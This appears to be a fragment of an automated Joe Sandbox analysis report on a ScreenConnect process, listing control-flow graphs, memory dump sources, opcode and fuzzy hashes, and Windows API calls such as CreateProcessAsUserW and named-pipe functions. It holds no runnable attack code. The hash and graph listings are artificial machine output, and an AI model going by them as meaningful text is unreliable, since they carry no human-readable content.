                                                                                  control_flow_graph 943 4a3f834-4a3f87b 946 4a3f889-4a3f92d 943->946 947 4a3f87d-4a3f886 943->947 954 4a3f960-4a3f96c 946->954 955 4a3f92f-4a3f95d 946->955 956 4a3f9a1-4a3f9b5 954->956 957 4a3f96e-4a3f99f 954->957 955->954 988 4a3f9b7 call 4a3fb80 956->988 989 4a3f9b7 call 4a3fb98 956->989 957->956 963 4a3f9bd-4a3f9c4 964 4a3f9c6-4a3f9dd 963->964 965 4a3f9df-4a3fa46 call 4a3f6a0 963->965 964->965 976 4a3faa3-4a3fab6 965->976 977 4a3fa48-4a3fa5e 965->977 978 4a3fabd 976->978 980 4a3fa65-4a3fa6b 977->980 981 4a3fab8 980->981 982 4a3fa6d-4a3fa74 980->982 981->978 982->981 983 4a3fa76-4a3fa84 982->983 985 4a3fa92-4a3faa1 983->985 986 4a3fa86-4a3fa8b 983->986 985->976 985->977 986->985 988->963 989->963
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fdq$ fdq
                                                                                  • API String ID: 0-859961282
                                                                                  • Opcode ID: b5c5a5ade3c9cfc42c5b48ed206eee531647e5b210ada4c9d7d848f283ccdac1
                                                                                  • Instruction ID: 90f880e4a327a435835893b3c9a60fff8b04e0b6ab516af7190db1eeb549a167
                                                                                  • Opcode Fuzzy Hash: b5c5a5ade3c9cfc42c5b48ed206eee531647e5b210ada4c9d7d848f283ccdac1
                                                                                  • Instruction Fuzzy Hash: 2271D131F00209AFDB05DFA5D8516AFBBB2EF89304F54856AE405AF351EF75AD068B80

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1100 4a3a270-4a3a292 1101 4a3a294-4a3a2a8 1100->1101 1102 4a3a2cc-4a3a307 1100->1102 1105 4a3a2b1-4a3a2c1 1101->1105 1106 4a3a2aa 1101->1106 1111 4a3a345-4a3a35b 1102->1111 1112 4a3a309-4a3a31d 1102->1112 1105->1102 1106->1105 1165 4a3a35e call 4a3a908 1111->1165 1166 4a3a35e call 4a3a918 1111->1166 1115 4a3a326-4a3a343 1112->1115 1116 4a3a31f 1112->1116 1115->1111 1116->1115 1119 4a3a364-4a3a366 1120 4a3a50d-4a3a526 1119->1120 1121 4a3a36c-4a3a396 1119->1121 1124 4a3a531 1120->1124 1125 4a3a528 1120->1125 1130 4a3a49a-4a3a4a6 1121->1130 1131 4a3a39c-4a3a3ac 1121->1131 1127 4a3a532 1124->1127 1125->1124 1127->1127 1134 4a3a4b2-4a3a4d7 1130->1134 1135 4a3a4a8 1130->1135 1136 4a3a3b2-4a3a3cb 1131->1136 1137 4a3a3ae-4a3a3b0 1131->1137 1141 4a3a4fc-4a3a507 1134->1141 1143 4a3a4d9-4a3a4f5 1134->1143 1135->1134 1148 4a3a3d4-4a3a3f9 1136->1148 1149 4a3a3cd 1136->1149 1138 4a3a3fc-4a3a3fe 1137->1138 1140 4a3a404-4a3a46f 1138->1140 1138->1141 1140->1141 1161 4a3a475-4a3a498 1140->1161 1141->1120 1141->1121 1143->1141 1148->1138 1149->1148 1161->1141 1165->1119 1166->1119
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #hn^$gn^
                                                                                  • API String ID: 0-3965619617
                                                                                  • Opcode ID: 14ac1f11ce0759d8f13a30d86e6e37e4d521b9d0627bfe590a470998de39538c
                                                                                  • Instruction ID: 3661f8695ce7611693abda829b2eb56d83fd395ab2003e0dfe3a6f9455cb908c
                                                                                  • Opcode Fuzzy Hash: 14ac1f11ce0759d8f13a30d86e6e37e4d521b9d0627bfe590a470998de39538c
                                                                                  • Instruction Fuzzy Hash: 9B71D431B402059BDB04EF79D9546AE7BA6EF85348B54C82DE406AB365EF35FC068F80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #hn^$gn^
                                                                                  • API String ID: 0-3965619617
                                                                                  • Opcode ID: 0986fc0bb9920a583b2641e9f82cdbbb786fedcee3b6da5a08b59eff580e5f11
                                                                                  • Instruction ID: a832ea8b956e40d58da5209e1138cd2d8f082da7ddfdd8faf69eabb27fff8979
                                                                                  • Opcode Fuzzy Hash: 0986fc0bb9920a583b2641e9f82cdbbb786fedcee3b6da5a08b59eff580e5f11
                                                                                  • Instruction Fuzzy Hash: F151DE32B402059BDB14EB79D8546AE7BA2EF84344B04882DE402AB365FF35FC068F80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53a0c3d04c7742289e5d56fd2e471731b8e743e073a264962cc7a54f55c2e8ee
                                                                                  • Instruction ID: 434123527ce7a89dd88a80b4e7b9e89787f3f9865a37e58c60e7a4697d5e9647
                                                                                  • Opcode Fuzzy Hash: 53a0c3d04c7742289e5d56fd2e471731b8e743e073a264962cc7a54f55c2e8ee
                                                                                  • Instruction Fuzzy Hash: 31517E72A00605CFCB24CF69D884AAFBBF5FB88310F14892ED45AD3651D774E905CBA1
                                                                                  APIs
                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 050E010F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcessUser
                                                                                  • String ID:
                                                                                  • API String ID: 2217836671-0
                                                                                  • Opcode ID: 8116a207933c3cfeaf336f3cecde93ef000d47f104f373558811423ca6a08881
                                                                                  • Instruction ID: cd5150110f6f7050c1c58c9db64a49b5c106a761cbb136309660e559115e972d
                                                                                  • Opcode Fuzzy Hash: 8116a207933c3cfeaf336f3cecde93ef000d47f104f373558811423ca6a08881
                                                                                  • Instruction Fuzzy Hash: D6418876800349DFCB01CFA9D884ADEBBF1FF48310F19846AE958AB251D3799A55CF50
                                                                                  APIs
                                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 050E1F30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  • Opcode ID: 758ee4ed2b715df9ae49c258d64ffd60d7b077353e425e74de1c1e402801af73
                                                                                  • Instruction ID: 50d0fbb89d3d9a588b967d01817db1016505611e136da59358e75eccad4e65cd
                                                                                  • Opcode Fuzzy Hash: 758ee4ed2b715df9ae49c258d64ffd60d7b077353e425e74de1c1e402801af73
                                                                                  • Instruction Fuzzy Hash: 3621F5B0D002189FCB14CFAAD485A9EBBF5BF48314F248059E859A7340DB759945CFA5
                                                                                  APIs
                                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 050E1F30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  • Opcode ID: 44be1effb0cf2456a58930d97812a4fa4f46728626385689643499115841c1f7
                                                                                  • Instruction ID: 6b6d1c1d529e680f1b233943be5d1ed1d16081af842b79e91eb805ee60ab0815
                                                                                  • Opcode Fuzzy Hash: 44be1effb0cf2456a58930d97812a4fa4f46728626385689643499115841c1f7
                                                                                  • Instruction Fuzzy Hash: BF2115B0D002189FCB14CFAAD485B9EBBF5BF48300F248059E819B7340D775A945CFA0
                                                                                  APIs
                                                                                  • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05DA655D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumProcesses
                                                                                  • String ID:
                                                                                  • API String ID: 84517404-0
                                                                                  • Opcode ID: 9946dc457c437801304335f4f149e2e2bd6b2a2612c4ca2070a73923f727fba2
                                                                                  • Instruction ID: d91de0aeac6026ce263a78430d057358f415f0ef156abf38c23471d365109999
                                                                                  • Opcode Fuzzy Hash: 9946dc457c437801304335f4f149e2e2bd6b2a2612c4ca2070a73923f727fba2
                                                                                  • Instruction Fuzzy Hash: 702103B2D04209DFDB10CFAAD885A9EBBF4EB48310F54842EE519B7200D378A945CBA4
                                                                                  APIs
                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 050E230F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamedPipeWait
                                                                                  • String ID:
                                                                                  • API String ID: 3146367894-0
                                                                                  • Opcode ID: 27b73f4144b64df415a72bc3d40d33fe23124d7765e283e58b67b35ac16f57a2
                                                                                  • Instruction ID: ba4c13d04cb308e06427b6fb025c8e0908be371a7c8a817e06265b2c4dd9a1e6
                                                                                  • Opcode Fuzzy Hash: 27b73f4144b64df415a72bc3d40d33fe23124d7765e283e58b67b35ac16f57a2
                                                                                  • Instruction Fuzzy Hash: 6F2127B680024A8FCB10CF9AD444ADEBBF4FB48320F14842DD859B7240D779A545CFA1
                                                                                  APIs
                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 050E230F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamedPipeWait
                                                                                  • String ID:
                                                                                  • API String ID: 3146367894-0
                                                                                  • Opcode ID: 41f329e9bbb96b4a2cc82df6d7c6cba9a957780ebb49a198a4d9233b3b45a138
                                                                                  • Instruction ID: c5fbe997b218ef4f1c731333d18dbfbceb316db06bb250254a5f5c682b207f98
                                                                                  • Opcode Fuzzy Hash: 41f329e9bbb96b4a2cc82df6d7c6cba9a957780ebb49a198a4d9233b3b45a138
                                                                                  • Instruction Fuzzy Hash: 5A21F4B68002498FDB10CFAAD444ADEBBF4EB48320F15842DD859B7241D779A945CFA5
                                                                                  APIs
                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05DA663E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessSession
                                                                                  • String ID:
                                                                                  • API String ID: 3779259828-0
                                                                                  • Opcode ID: 43768e21a80697ce3d14b63e619f9f67aed0f56d5b81e11401582b6d982d1818
                                                                                  • Instruction ID: 9fee612fd7d0e965c4df790a7b46e3d8c0eb4bd72812a2de39591d7f9dfe541b
                                                                                  • Opcode Fuzzy Hash: 43768e21a80697ce3d14b63e619f9f67aed0f56d5b81e11401582b6d982d1818
                                                                                  • Instruction Fuzzy Hash: 7C1103B1C00249CFCB10DF9AC44579EFBF4EB48324F14846AD569B7240D378A545CFA5
                                                                                  APIs
                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05DA663E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessSession
                                                                                  • String ID:
                                                                                  • API String ID: 3779259828-0
                                                                                  • Opcode ID: 7a34355d3b0c426f9eca3b91e11f716bd04bd4f2b04c6c7cc3ef57e380b3da8c
                                                                                  • Instruction ID: b49e9fe517af4ff0ac682bb8e69c374a218982a119c76ee8cad6c51de7cf65a5
                                                                                  • Opcode Fuzzy Hash: 7a34355d3b0c426f9eca3b91e11f716bd04bd4f2b04c6c7cc3ef57e380b3da8c
                                                                                  • Instruction Fuzzy Hash: 101100B2C002199FCB10CF9AD545ADEFBF4FB88320F14846AE429B7240D778A545CFA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: cCj
                                                                                  • API String ID: 0-402514063
                                                                                  • Opcode ID: b2e675bb45e14d698ae2af5baa470bc73887e9b605019210604a613631a82368
                                                                                  • Instruction ID: ce8f866e27dacd0ca298d6e4e4b444220b9813a0ed380f9507fd09572c451559
                                                                                  • Opcode Fuzzy Hash: b2e675bb45e14d698ae2af5baa470bc73887e9b605019210604a613631a82368
                                                                                  • Instruction Fuzzy Hash: 2CA19C70A002099FDB14DF28D994B9DBBF2FF89304F1484A9E44AAB365DB35AD46CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `Q_q
                                                                                  • API String ID: 0-1832742057
                                                                                  • Opcode ID: d3c99d56c064cdca0dd9f36749377d543b3f56722ae1debf61563bfce2b16ffd
                                                                                  • Instruction ID: 132d48187888812576176b2ebec74ca160c58435abc6a00974b0aaa1c9632ade
                                                                                  • Opcode Fuzzy Hash: d3c99d56c064cdca0dd9f36749377d543b3f56722ae1debf61563bfce2b16ffd
                                                                                  • Instruction Fuzzy Hash: D741C230B401099FEB04AB78D9557AEBBB2EF88305F148429F506E7390FF74AD069B91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: cCj
                                                                                  • API String ID: 0-402514063
                                                                                  • Opcode ID: 90ce6c61a74e8eb3c36c42715d44a7417e196929d84c287b64ffad3fd7b740f4
                                                                                  • Instruction ID: 495acc5d25432439b821fb142dbb7ee7b27a759fbe56cf836c2f9c462e5acf8f
                                                                                  • Opcode Fuzzy Hash: 90ce6c61a74e8eb3c36c42715d44a7417e196929d84c287b64ffad3fd7b740f4
                                                                                  • Instruction Fuzzy Hash: 09412378B00215DFDB54DF28C984B99B7B2EF89314F2484A9E449AB361DB35EC81CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: cCj
                                                                                  • API String ID: 0-402514063
                                                                                  • Opcode ID: 7a5ede406f0061a94fb7b7a0946579e7fdff9c5057479f90b5e2f7c254cfacdb
                                                                                  • Instruction ID: 02668f837568c3005c41fb09788742631b387ccf8d62533f0a560f6302ad2adf
                                                                                  • Opcode Fuzzy Hash: 7a5ede406f0061a94fb7b7a0946579e7fdff9c5057479f90b5e2f7c254cfacdb
                                                                                  • Instruction Fuzzy Hash: 85413374B00204DFD714DB28C988B99B7B2EF89314F2480A8E50AAB361DB35EC81CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;Yn^
                                                                                  • API String ID: 0-1462968236
                                                                                  • Opcode ID: f89d882e05e26ce5c898927bd5b760f37deaad8de4ba2c55f8cc0fa75ad5763b
                                                                                  • Instruction ID: 1454a59fc65843e4b6378fd50416b594dec5cef4276ac30f2dbe9ed8582f2966
                                                                                  • Opcode Fuzzy Hash: f89d882e05e26ce5c898927bd5b760f37deaad8de4ba2c55f8cc0fa75ad5763b
                                                                                  • Instruction Fuzzy Hash: 74317E31A002049FC714EF79C94469EBBF2FF88314B658969E50ABB355EB35FD428B90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,
                                                                                  • API String ID: 0-3772416878
                                                                                  • Opcode ID: 6a50985997f993b1ec048038920829196a4f2188d3d2899e9e986c63d371bb6e
                                                                                  • Instruction ID: c0e88323c3b15d8e7047d49e9b47595bb0ceddccd50518b319dbb31402bbc9b6
                                                                                  • Opcode Fuzzy Hash: 6a50985997f993b1ec048038920829196a4f2188d3d2899e9e986c63d371bb6e
                                                                                  • Instruction Fuzzy Hash: 00217F35B002148FDB18EB74D854AAEB7B7EFC9614B10846DD50BEB390DE35AC028B50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,
                                                                                  • API String ID: 0-3772416878
                                                                                  • Opcode ID: 56412b45d3cc29acffe1edfbd08cee8f676330c4638248ac9144425d4e020664
                                                                                  • Instruction ID: 34105b3ac25e0fd13c422935607c0c6774dbee51790423bfb99a89bf7caacecc
                                                                                  • Opcode Fuzzy Hash: 56412b45d3cc29acffe1edfbd08cee8f676330c4638248ac9144425d4e020664
                                                                                  • Instruction Fuzzy Hash: D8215E35B002149BDB18EB75D858AAEB7B7EFC9614F10846DD90BE7390DE35EC028B91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;Yn^
                                                                                  • API String ID: 0-1462968236
                                                                                  • Opcode ID: dd064d2820c11f997d84f8baca35dfce19d0ef757cc42247f628de565dd393e7
                                                                                  • Instruction ID: 366e76a07f914b0ae4501efc183823f8c593bdf95e423b345c1db9f5340e2ed7
                                                                                  • Opcode Fuzzy Hash: dd064d2820c11f997d84f8baca35dfce19d0ef757cc42247f628de565dd393e7
                                                                                  • Instruction Fuzzy Hash: 9A21A1327002049FC704DF68C98499DB7B2FF88314B65C969E406BB356EB36FD428B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c73154069445b71e175aa30b095e543821b733f3afb19cbc22edf25680ad6e0
                                                                                  • Instruction ID: bd57dc8312671f35479c696ba2bb7a6baa6155cbe7fafb6706a8e7330a561888
                                                                                  • Opcode Fuzzy Hash: 6c73154069445b71e175aa30b095e543821b733f3afb19cbc22edf25680ad6e0
                                                                                  • Instruction Fuzzy Hash: FCF14D74E002298FDB24CF65C990B9DB7B6FF48305F1081A9E909AB351EB75AE85CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b85918b8bf4ac58b46e0636e8de7b72ab6c1907f2322363cbd12e800d8ddd541
                                                                                  • Instruction ID: 773b387300ea36ef227788e2d9ff45907d201996f32728056921f4b7f076a3bd
                                                                                  • Opcode Fuzzy Hash: b85918b8bf4ac58b46e0636e8de7b72ab6c1907f2322363cbd12e800d8ddd541
                                                                                  • Instruction Fuzzy Hash: B1A10D3590064ACFCB05DF68C590889BBB1FF99314B15C59AE818AF326E771FA46CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f1ebfc88fed54cb3f375fc6248e07ef76ac5d0c5013502a41b3698292891fb9
                                                                                  • Instruction ID: e48a75838b8cf235c7a8954141e0cf16334182fa2f442de95dc57f4515d916f9
                                                                                  • Opcode Fuzzy Hash: 9f1ebfc88fed54cb3f375fc6248e07ef76ac5d0c5013502a41b3698292891fb9
                                                                                  • Instruction Fuzzy Hash: 5171E674E4022A8FDB24DF68D954BDDB7B2EF88305F0080A9E50DA7351EB70AE858F50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 825c01261603fdcb518c409f293f0b1144b8190042973b2efe60fd62efa429d5
                                                                                  • Instruction ID: af7b7b8cd06811a81f8da7628be4a3c17d2dc2bf2dc582ac997956df3b2734eb
                                                                                  • Opcode Fuzzy Hash: 825c01261603fdcb518c409f293f0b1144b8190042973b2efe60fd62efa429d5
                                                                                  • Instruction Fuzzy Hash: C4418431E406469FCB05CF68D9505DEB7B2AF86304B158569E905BB224EFB1FD4ACB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89300ba68aac82a836128c8f61251eba69a97454f03d5eecc81f04be742fff10
                                                                                  • Instruction ID: f8edd5d4c8b76e992fd431bb4f6d7083146b16adc28a72568763a7776f19e71a
                                                                                  • Opcode Fuzzy Hash: 89300ba68aac82a836128c8f61251eba69a97454f03d5eecc81f04be742fff10
                                                                                  • Instruction Fuzzy Hash: AA413E71A007049FD734CF69D95059AB7F6EF84321B108B2DE466C76D5EB30F8058BA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cc4a893e998023c0cdec701caaccc8bc15526eedaca007b20c68f102ec67b706
                                                                                  • Instruction ID: f3ba0d77d812cff1b4e5801447aabc571ae6831d07e44524bbe3df78c2e3a7f1
                                                                                  • Opcode Fuzzy Hash: cc4a893e998023c0cdec701caaccc8bc15526eedaca007b20c68f102ec67b706
                                                                                  • Instruction Fuzzy Hash: 3741A271E103099BEB18DF61C9557EEBBF6AF84305F208429F405AB290EF75A945CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62da57c1bdc4eae3e104dbf77cf6b9f3483f3069d0147cb5f61bb262ce2c591f
                                                                                  • Instruction ID: 96ade977ea7dd67adc9289a2f05c75884c91252c70c27c6186101b0001f6ff07
                                                                                  • Opcode Fuzzy Hash: 62da57c1bdc4eae3e104dbf77cf6b9f3483f3069d0147cb5f61bb262ce2c591f
                                                                                  • Instruction Fuzzy Hash: CD319171F103099BEF149F61C9547EE7BB6AF84305F208529F405AB291EF75A945CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c623bfca5dd9d3c5636f9af29a49a71975d523ab917f088fc9c7dc7f99117fd3
                                                                                  • Instruction ID: 72f872a2b94bf53f701385b68eaa2a8702e37cd1991de312aa03214bbd777f93
                                                                                  • Opcode Fuzzy Hash: c623bfca5dd9d3c5636f9af29a49a71975d523ab917f088fc9c7dc7f99117fd3
                                                                                  • Instruction Fuzzy Hash: 06318131700215CFCB14CF68D9C4A9A7BB5EF89325B0445A9E851AF3A9EB31F851CBE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5f2b8836fe53825f01e1d6e3f6f41165718c4476e416889e61d5d95a07b28272
                                                                                  • Instruction ID: a726ae03a59f86f3352fc9065869b2477fe566a8369954c0d4afc145c8187183
                                                                                  • Opcode Fuzzy Hash: 5f2b8836fe53825f01e1d6e3f6f41165718c4476e416889e61d5d95a07b28272
                                                                                  • Instruction Fuzzy Hash: 7921BB31F4061A5BDF15CAA9D8006EFB7A6AFC5300B148425E901AB324FFB1FD068B80
                                                                                  Memory Dump Source
